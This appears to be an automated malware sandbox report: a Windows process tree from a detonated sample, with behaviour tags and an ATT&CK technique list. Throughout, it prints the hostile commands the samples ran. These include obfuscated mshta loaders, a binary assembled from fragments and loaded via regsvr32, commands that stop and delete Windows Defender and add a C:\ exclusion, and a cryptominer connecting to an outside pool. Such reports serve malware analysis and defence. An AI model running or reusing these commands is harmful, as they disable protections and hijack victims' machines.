C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\2596.exe
C:\Users\Admin\AppData\Local\Temp\2596.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:4744

C:\Users\Admin\AppData\Local\Temp\2EFD.exe
C:\Users\Admin\AppData\Local\Temp\2EFD.exe
1⤵
- Executes dropped EXE
PID:640

C:\Users\Admin\AppData\Local\Temp\3140.exe
C:\Users\Admin\AppData\Local\Temp\3140.exe
1⤵
- Executes dropped EXE
PID:2216

C:\Users\Admin\AppData\Local\Temp\345E.exe
C:\Users\Admin\AppData\Local\Temp\345E.exe
1⤵
- Executes dropped EXE
PID:1172

C:\Users\Admin\AppData\Local\Temp\3BB2.exe
C:\Users\Admin\AppData\Local\Temp\3BB2.exe
1⤵
- Executes dropped EXE
PID:4352

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript: clOSE (CrEAteOBJect ("WscRIPt.ShELL" ). rUN("CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\3BB2.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\3BB2.exe"") do taskkill -f /Im ""%~nxs"" " ,0 , truE ))
2⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\3BB2.exe" ..\IpDIhVj3g.ExE &&STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M&IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\3BB2.exe") do taskkill -f /Im "%~nxs"
3⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
4⤵
- Executes dropped EXE
PID:1828

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript: clOSE (CrEAteOBJect ("WscRIPt.ShELL" ). rUN("CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " ,0 , truE ))
5⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE &&STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M&IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
6⤵
PID:4576

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCrIpT: cLose (CreAteObject( "wSCrIPt.ShelL"). RUN( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg +3KLPjZ48.1 + JBBP.aZ+jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0, tRuE ) )
5⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i+HzMuGQn.ebg +3KLPjZ48.1 + JBBP.aZ+jjD1CZ.Z+ME53U.RD +G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ&sTaRt regsvr32.exe ..\LphZr4.XZ /U -S&dEl /Q *
6⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
7⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
7⤵
PID:904

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe ..\LphZr4.XZ /U -S
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4772

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "3BB2.exe"
4⤵
- Kills process with taskkill
PID:3308

C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe
C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe /d"C:\Users\Admin\AppData\Local\Temp\1EAF.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4272

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5100

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\4587.exe
C:\Users\Admin\AppData\Local\Temp\4587.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 4587.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4587.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:3688

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 4587.exe /f
3⤵
- Kills process with taskkill
PID:5192

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:5900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4464

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3728

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5320 -s 1224
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4084

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:5416

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5260

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5372

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:5784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2600

C:\Users\Admin\AppData\Local\Temp\DCE1.exe
C:\Users\Admin\AppData\Local\Temp\DCE1.exe
1⤵
- Executes dropped EXE
PID:4168

C:\Users\Admin\AppData\Local\Temp\1CF.exe
C:\Users\Admin\AppData\Local\Temp\1CF.exe
1⤵
- Executes dropped EXE
PID:212

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
2⤵
- Executes dropped EXE
PID:5880

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop WinDefend
3⤵
PID:7020

C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
2⤵
- Executes dropped EXE
PID:6652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4944

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ilhfpjcnwnajcrpxnvjafck.vbs"
2⤵
PID:6776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Drivers\Notepad.exe'
3⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\1CF.exe
C:\Users\Admin\AppData\Local\Temp\1CF.exe
2⤵
- Executes dropped EXE
PID:512

C:\Users\Admin\AppData\Local\Temp\1CF.exe
C:\Users\Admin\AppData\Local\Temp\1CF.exe
2⤵
PID:6032

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 212 -s 1648
2⤵
- Program crash
PID:4620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4960

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6932

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3652

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6024

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5956

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4292

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4292 -s 2012
2⤵
- Program crash
PID:6868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5648

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:724

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4572

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery